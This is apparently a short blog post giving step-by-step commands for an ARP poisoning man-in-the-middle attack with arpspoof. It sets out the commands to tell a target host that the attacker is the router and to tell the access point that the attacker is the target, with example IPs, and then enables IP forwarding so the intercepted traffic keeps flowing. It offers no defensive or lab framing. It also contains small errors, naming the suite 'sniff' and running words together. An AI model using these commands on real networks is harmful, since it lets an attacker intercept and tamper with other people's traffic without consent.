##############
##ARP Poisoning##
##arpspoof######
##############
Arpspoof is a tool part of a suit called sniff, which contains a number of networkpenetration tools. Arpspoof can be used to launch a MITM attack and redirect
traffic to flow through our device.
1. Tell the target client that I am the router.
arpspoof -i [interface] -t [Target IP] [AP IP]
Ex: arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1
2. Tell the AP that I am the target client.
arpspoof -i [interface] -t [AP IP] [Target IP]
Ex: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5
3. Enable IP forward to allow packets to flow through our device without being dropped.
Echo 1 > /proc/sys/net/ipv4/ip_forwardARP Poisoning
Comments
Post a Comment